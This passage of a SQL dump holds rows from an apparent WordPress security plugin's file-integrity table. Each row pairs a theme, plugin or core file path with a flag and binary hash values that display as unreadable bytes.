`�A���;�y_���<��X�\Z�%Y�','',0,'?'),('֌��q�ó�X�[���','wp-includes/class-wp-feed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~��܏�4��','',0,'?'),('֡��}�>vm�I�','wp-content/themes/hemingway/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6�5��n���=��','�=�Z:f?\'I�.�W)Pچ3�o�f�{Pɼ�Ob�','',0,'?'),('ֶ��9؞f�po3t','wp-includes/class-wp-admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('ּt�b�[����','wp-content/themes/quicksand/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m��j�;U���','��\'��:��j�:~~\Z��w�@�$s�Z����9�','',0,'?'),('��J��!�[W6ݧ�','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�w�VX�8��~$�','����%����m���򳚫-[�\0:�&��','',0,'?'),('��JL���T��\ZW�jA�','wp-content/themes/brickyard/js/selectnav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JƑ�uf�9a��D�','�ZC�C�Nf�`,�&\nk�� �\r�\0m�΋;v�x','',0,'?'),('��<��b�XUM�@\\!','wp-content/plugins/wp-cerber/assets/flags/pt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8��,t7s\'��=K^','qd<Q\Z�fe�-�	%�7��5[�1�+i�uG�','',0,'?'),('�\0��g��ػ��O�o�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/hint/anyword-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k���\0~�r�[�','�ʒ�UH<.�A{{.\Z�^����vFY��b\'','',0,'?'),('�[O��mT�G�P�','wp-content/themes/auberge/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�s�|��s�]_� d','��0�Cyo�@V˽[�\r�1�M�	\0\Z~e���	5','',0,'?'),('�������(u���.','wp-content/themes/wp-simple/assets/images/preview/chairs.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	]\n�sQ��9���R�','�\\�;��1�5y:u���.��i��8�+I\ZP�','',0,'?'),('�;P���K0~�_�0x�','wp-content/themes/brickyard/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A?��ci�1q����1f:','����V�a%���\'�.	\\d�,��W�wpW�U','',0,'?'),('�Gȩ��6����\0Y','wp-admin/includes/class-wp-posts-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m	�(�J\Z+x��,�','8�t�Ä���W�#��ښ�̟�+_@C����','',0,'?'),('�I�	J��a~R��Z�','wp-admin/includes/class-wp-application-passwords-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��\\�б�(�\"��E','}|N�on-����q(\\��F�SX�i\'��$','',0,'?'),('�M\0���c����_d�','wp-admin/includes/class-file-upload-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��;>�x�Z�s�6','[\"o�^�.q`Oצ��v��<���Q�+FM�4��','',0,'?'),('�N�6�=��j�\')b','wp-content/themes/catch-flames/css/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\"��jVd;I@[v��','l�(\"~�T<]{d��\"p������zW:�','',0,'?'),('�P!����}�S�Ұ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,W��	�)��,�^�m','G+xڍaȴѾ䄮�C\0B��,��L��w','',0,'?'),('�f�k[x���� \\�/Y','wp-includes/js/dist/redux-routine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�|�WaU\0��κ�Ht','�B&�VJ�ŋd�#�l�f��c;�}3T�%K{','',0,'?'),('�l�����3V� \r','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dashicons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ˢ$��Krǡ)Fb��','�tM�V_d�B���A��4�D�ڇ��ǒ}��3	(','',0,'?'),('�n\\w�;\\]Ǜ��#�','wp-content/themes/twentynineteen/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�������:�t','yg�۱���Jg��zV��x�����=H�','',0,'?'),('�rg7���/��\n~�.','wp-content/themes/exoplanet/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�����S�턞Ψ','��7�f����ʁ���� |Mޕ�v��BA�:','',0,'?'),('�t��Fv:8(����','wp-content/themes/chronus/template-parts/featured/featured-small-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f}S��\0�o��l','��>I�(�o-�+�ʒг��p�3��ߕ��','',0,'?'),('�w�h]�á�&�wM��','wp-includes/class-wp-network-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('�{��wk5�%����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6N�?l�1���FsT^','�\0+\"\"��:*8l��Ia�-(��/\rsL�','',0,'?'),('׀˶�\\��;�{�j�','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2mqIEӢ��S�Z','ok8��m&3\Zz9���x3w,f1�ML�s','',0,'?'),('מ�y�7mE5���O_�','wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���NX���\\m��','P��[H{lW�@\0!�!��s�_�/j�F�Č�','',0,'?'),('נqE|?|8B�uk��','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/checkbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��I���n���kz�','_��\'`���tQ?_��`N�\0C���p�X��','',0,'?'),('�Ć��c��ij�B;�','wp-content/plugins/wp-cerber/cerber-pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\%�9��,\rY\Z�+N','\"�&��=+�3ʰ�;��\r�I[h�NY���','',0,'?'),('��j0���w�E}®R�','wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Upʓ�H�WtP!�H','�^���E-�R�����\'#?�le��mL0�kU@�','',0,'?'),('��;��˟aS`���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/keymap/vim.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�bs�������~k�','�8��xA�`,��0�au��;?ORO��j���','',0,'?'),('��^�u����}�G��','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��΁~͟��ak��','u\Z�g$}o����bĄ��+\r��\n���8�','',0,'?'),('��x8�c���	�73�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/lint/lint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','% �\'�������','�p��$�(p;P���T5̛0�Q�=x|�r�a�','',0,'?'),('��BK%E`	��%Xg<&','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/night.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','դ���.��*��۸','��~n�pΎ�e>>Ҽ������Rݣ���	�','',0,'?'),('�����C|���Pf��','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),('�ahH�N�Ѓ(?>�','wp-content/themes/advance/headers/part-head1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R@]Af	�#�V�i�N','�o�Y��@�8�H�C�����*\n��l�','',0,'?'),('�d[�9fCV�P�E�','wp-content/themes/graduate/inc/customizer/theme-options/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��i��g�Q�ε�\n','�˻(�d4�%ȭ•:l������6�MM��','',0,'?'),('�\nH��Շ��(�b\\�7','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-number-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��4��	L�?��','�I&��\n$��E:��N��r�t�\ZK(o\rͰ}��','',0,'?'),('��<Q����_4�t','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{G��(�땤h��','z��Х��Y���\'R�H�y��Ri�V~��\nȿy�','',0,'?'),('��\Zv�I:wm�\'~K-','wp-includes/ID3/module.audio-video.riff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('�#bjN�[�쮟/�/�','wp-content/themes/newsmag/template-parts/author-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�:[g\rrڽ���q','A\"����	R��cL?�uq�d��AI��^6�^','',0,'?'),('�%��i^�9|k����','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��LO�c��!��(�g','��ax����Ŵ�)�lL�m�ݵ���B�o*���8�','',0,'?'),('�&�Zh�$�Éo�','wp-includes/class-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kE\Z�[Z����䰱�','�D����t��5��^	�σ�7�2��7�{','',0,'?'),('�8/B��$8���`m�','wp-includes/js/imgareaselect/jquery.imgareaselect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('�A�h)I�\Z]Gr��E','wp-admin/includes/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�m�|�<��(`�','6\r6\r�@�u<�z(�_�����0�v�*�','',0,'?'),('�C>��J����w��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѡ�F�hO\nȆ=�b�','�NrR�\0�Λ$�FN�Y���C%��m�\rK*�','',0,'?'),('�F�o����]�','wp-content/themes/simpleshift/inc/kirki/assets/images/jquery.fs.stepper-arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/!C�\ra2���ռ;��2',' �^���$Vy˃0?�N�}�H6��?鶬','',0,'?'),('�GH�k�$�f�:#�t','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/search/matchesonscrollbar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����2:�s7��r��','�R\"�S�}����|�Xt�⽾��/����K�','',0,'?'),('�J=R\'���t^�}�\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��H','n�p��ʅ���G��0�6Kq�J]����J�','',0,'?'),('�M&�3\r�3CMaQ{','wp-admin/images/yes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��7܉�\rqZ�Qk','�=�Q��G���9%�K���,�\r�\ZF�y���','',0,'?'),('�V��5�<�\0���v��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�z��ku�)-�<K','AG��%N?�LQ=4��c�yO���\',�@�b','',0,'?'),('�o�ǣ�	ף�f0�Y','wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('�v����\r�&X��','wp-includes/js/jquery/ui/selectable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('�x��βЦ��A	�<�','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�R`�����9|�e','U�͊�s��ds�9;�C�O���Ȥ�@','',0,'?'),('ؓT�^w/�%1��','wp-content/themes/singularity/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ҫ�;N��YL','�W�ya��I���� �kBq�g3b��\Z�','',0,'?'),('ؙp�nyٺ8[�l��WI','wp-content/themes/newsmag/assets/sass/elements/_elements.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʹ��w�O3I��','�=�8ý��C�n!����Q�b�l���U��','',0,'?'),('؟&�Qo�����','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-kirki-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��/���Hg��','�J������Cr�]=�k�˿�*+)��U��(','',0,'?'),('إ�J�}������n','wp-content/themes/event/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����N�j�� �','6՜<��X��r|	t�b	� ��1�\01y��4','',0,'?'),('ر�-�_}Z�h��\n�\Z','wp-admin/includes/class-walker-nav-menu-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��H�Y��SAK�k�\n�','�M��$N}�IF��)M����`\r�c�*�Q4��\'\n','',0,'?'),('ط�;����\0���','wp-content/plugins/wp-cerber/assets/flags/cy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�o||/$�B���l','븻�Òc���.\"��0C�i+\Z�\Z�{pċ����a','',0,'?'),('ؽ�)��uҶ�ew��l','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mhOല�f�.I','�o�O�b�9_��b�-4��-�x%�T���5E9\'�','',0,'?'),('ؾ��U9���;Y��u','wp-content/themes/advance/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�z#�K^u,,�\'','�X�[�DKVmP��v�qB��}�ux�\'3o��Jk','',0,'?'),('�φ{)�e]�ŝ�4ܴ�','wp-content/plugins/wp-cerber/assets/flags/sc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���\'hz�\Z�uR�m�','1W��b�[^\'�J�Z�O��\0.\n )����','',0,'?'),('��Y���m$Q���+h&','wp-content/themes/university-hub/css/metabox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6���k]�Vj�','~<�����D]����j�z��r)G?+�6�zRH','',0,'?'),('����;�h=��MP�','wp-content/themes/metro-magazine/inc/customizer/custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4k��TN�N%�','�@7$�L�r��a�������?�I�1׍\"%��{�','',0,'?'),('��ҡ���K%����^�','wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�I�k���o���^?\n�','��\0.����ɕ�`�	�Ʃ��P���','',0,'?'),('�����k��\"η�r�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/3cm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z��6�\"��','/��F��Z�\n�W�i<\no��>D��]�����','',0,'?'),('��\\��ՎB��X�1э','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/textile/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�A�J�[\Zs��E(','�v2���*� 6	-(/Ӡ[�t�1o�ٵ�t�w�','',0,'?'),('�-h\n\r`��ýەC/s','wp-includes/class-wp-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\'\'��UQ�|4��','F�7��������S�1�\Z�`#�4�\rHsL\n','',0,'?'),('�?s�\r/4Ѩw�Z�','wp-content/themes/newsmag/assets/vendors/machothemes/components/offscreen.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8~�%!t����K��Е','��K\'*�JT`��wU{�ҝ���d�8N��','',0,'?'),('�r��-����D.�\\�','wp-content/themes/twentytwenty/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7H7��g��t~��Ǿ^','���^��Q��EQ�>���[�!��Be&z��','',0,'?'),('�\"�a\0�ح�C!��','wp-content/themes/wp-simple/inc/kirki/assets/images/kirki-bottom.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x*QX�WTe���8�','�cA(Ϲ��0��\ZQ\n/���B�9��B���c','',0,'?'),('�%N�^ǽv�7s�@\n�5','wp-content/themes/twentytwentyone/assets/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_{�m��<R�zx��','�4R���]�,}�\0���m��E�:��!�','',0,'?'),('�\'�J]կ	�O','wp-content/themes/wp-simple/inc/kirki/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"\'�f�C�2Њ','\03c��k���if{��\Z�g��6��kW���','',0,'?'),('�,(�i7:^�^�#','wp-includes/js/tinymce/plugins/paste/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�0&\'�և�P��i���','wp-content/themes/wp-simple/parts/frontpage-action2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k}bx��Q�y7�3','�$Q���;��<��ovM��qiչx�gU','',0,'?'),('�9\\z��d�I�\"���\"','wp-content/themes/Yegor/no-results.php',0,'\"	�y�^�^G��y','\"	�y�^�^G��y','um��4��D<�>�}�\\1��.��	:�c��Y','',0,'?'),('�>��[�ұE�D�;�','wp-includes/block-patterns/three-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ǟ�(	aL�)�m','\r��)��k���O�dS0�X�z���_����','',0,'?'),('�D�Z���i��Ҩ','wp-content/themes/advance/inc/admin/img/service.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���Ĺ�X�L̵','�/��;�E�X�o�J�l��sޓ4΀��v�Q�','',0,'?'),('�E�F�d��b�f[�','wp-content/themes/brickyard/css/pie/PIE.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\\��t��vw���z','���b�bx*a~ݒ�Tp�@v����{:@��','',0,'?'),('�J��^\Z7��uG�k+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�_<���-1�__I��u','�%d����d��_�\01@TY�$����A','',0,'?'),('�M��{0:�\0L���4','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����N�?Jk����','Q=\0oW�o9�7i�d�@S\Z=�ל�5�%h�T','',0,'?'),('�^ ہ�\\��i�(\Z��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/radio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{4��ȦAGȲ�n��\"','I��\r�α���m-g����$s�=�\\�O���&+','',0,'?'),('�d��%3��Z�4��_+','wp-includes/css/dist/edit-post/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{J����3=�f�','w��ko����xv&Aޭ�� T�gޗ���','',0,'?'),('�k��/y�����&��G','wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('�l;ao��~�G��','wp-includes/Requests/Exception/HTTP/501.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eڸ04�-?��ב�5','�k�G寲�\n΃CD#�6�u\Z�քEڣ@K1','',0,'?'),('�{�R��V��IG��^�','wp-content/themes/graphene/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����e���}�՘�','��w\r���&�ɥ��_�=���Ǵ�\n���(�\Z�','',0,'?'),('ق���)�4�g����0h','wp-content/themes/twentynineteen/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�oG;� k�\Z\"�','��ՙda��1,6����9�%ef;V�5+�','',0,'?'),('و�TĖhx~Dt>l�','wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R6�\\J��\"5r���','h��l�2������<��_9��x����C�ҏ','',0,'?'),('٘�\"P�ܞ��,���','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('ٸ�������lcp�','wp-content/themes/authorize/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z3������Q�����','Bàh� ���@hj����:��\n�s��|x�','',0,'?'),('پ[��v�J_.�G�','wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-���|��e,��','#���&=!����ȝp�x�ǻ�\\7��2�y','',0,'?'),('��{��]]��R�\n]','wp-content/plugins/wp-cerber/assets/flags/md.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z6>�x��D�\ZL/x\n','���[Ρj*�Z�\'��ӛ�U!Wa�����\\','',0,'?'),('���؄��#�V7��(d','wp-content/themes/graphene/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��ڵLͷKÂ\'��','��^F���b���C�/#eE:��oP�h��','',0,'?'),('��3��I�98\\�֛�[t','wp-includes/random_compat/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L	�L�M�ʫ�)�','',0,'?'),('��U)9�J�/AS�&�','wp-content/themes/enigma/images/Creative.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T8���i;$(�8��n�','��J9uT/H����+�y]�^})�kC��;+f�5�','',0,'?'),('��!}�=�`*�gZ=','wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ь�ԥ�d�o|��ܪ','��%�v׫\0���\r��΋��:c��GO���','',0,'?'),('��-,��~JD��mM�','wp-content/themes/gildrest/lib/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~��ڙ1ӯ���=','MΉ�A\\��\\Q27�=K�J|*�/v�Iգӏ','',0,'?'),('�VBǡ��\Z�B\"\0��','wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('�>�~�!�g�q��','wp-includes/js/tinymce/skins/lightgray/skin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��B���&�pw�','7>xV&v|­��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('�\0-���o�s�x ���','wp-content/themes/advance/css/unminified/foundation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�%�5���<�g��0|','���|n���[(�Zr�P�F���#����eI','',0,'?'),('�\r��Be�ׯE�7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y}���`8v�FJ','�U��߆(�[�r嵳��g���h��嬵!m9(\"�','',0,'?'),('���u��xy���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��w�=Ţ�O�&�F�','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍���|DW��!E�4','S��o�Gp����{���\"�FuS�&�����','',0,'?'),('�\'��7��b��~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�)f��k�Xy���','wp-content/themes/newsmag/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȭ\ZJ��rb\0(�ׅ��','�W)k�,�G9�HY�Hϒ�	U砆�nT�z�<�','',0,'?'),('�,\r��	�g�H�6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','᪟L֍6����\0��W','�\0�6�3^r1�l�9cqY�p�h�Okl�\r�K','',0,'?'),('�.b���1�5*����E','wp-content/themes/catch-responsive/js/fitvids.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͑Y�Dgؖ\\~��','����#$J��Dn�\Zh �����!�ܗ�	z�','',0,'?'),('�2�6,̞|ke�L\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)�h\\ h�G�8�','C�%�0�z)f ����@�t>��ɶ{T��8�o�','',0,'?'),('�Aw��`��qgL��.','wp-content/themes/enigma/images/enigma-banner.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9lAh�w=c�pc�','��D�9��%)쳞��{�\'G�Xi⿐','',0,'?'),('�P�),�|��bX�|0�','wp-content/themes/city-store/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qc��y��.i��P�@','qi�`���0��sW%Aݳھ��gB�KA��6','',0,'?'),('�X��O���\"����|','wp-content/themes/wp-simple/inc/kirki/tests/test-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�a+3�@��\r�uv~E','mG�nw�n����ʼ��y�Ѣ����','',0,'?'),('�`V�\\�������9�','wp-content/themes/twentynineteen/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��Gm��xW���d','	N��ż	�I6h�%^�?`v�Y�=��2��','',0,'?'),('�al��b��o	;����','wp-content/themes/newsmag/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M���+S�O���]','x6�@�\n�qv�dR>��{�8^�_��pQ','',0,'?'),('�l\nE�U��A�I)u�','wp-content/themes/the-best/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PA�\r��y��p/�','��j�;�\Z�Ve������3ϰ\'�de�1�','',0,'?'),('�o}=�5\02�h����','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/code.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#3]r,AzF�l�','Z�Qs��[��{�\\?�p�t֑]|���U-�e','',0,'?'),('�u78�¸�KԊkh�','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\"p6;�oZB?��6��','�}�SjȎwy��`��`��R=�*�ɒ�\"*g','',0,'?'),('�|�#�԰#�{����','wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"1��6�����','z���;���LRK�`�jݰ�P\'�N�v\'','',0,'?'),('ډx`�9�LťM��,L','wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�뺆��	�#��y�k~','(���䚆�u$/�/��f��Ш�۬x��M','',0,'?'),('ڋ�|���	,���','wp-content/themes/enigma/css/font-awesome-4.7.0/less/larger.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�����&&�\Z|�(','iѪ8j0��NK��a\0�n��JtR��P|D�F','',0,'?'),('ړ��R��Oʜ�/A/m','wp-content/themes/edge/inc/customizer/functions/theme-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z~n�yF񛓤�q��V/','�tIR�\Z����.{���Q/^��v\\�#�M��','',0,'?'),('ک�W��,`��|','wp-content/themes/skt-pathway/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�Kb�D�.���^t1','��\"�ǜ˱�����r�\"	